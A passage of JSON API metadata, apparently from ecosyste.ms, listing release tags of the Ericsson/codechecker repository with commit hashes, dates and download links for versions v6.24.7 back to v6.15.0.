pos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1-hotfix1/manifests"},{"name":"v6.15.1","sha":"692e51ba4be08e97c4b07cc344edca082dc50f63","kind":"commit","published_at":"2021-02-03T12:52:17.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.1/manifests"},{"name":"v6.15.0-hotfix1","s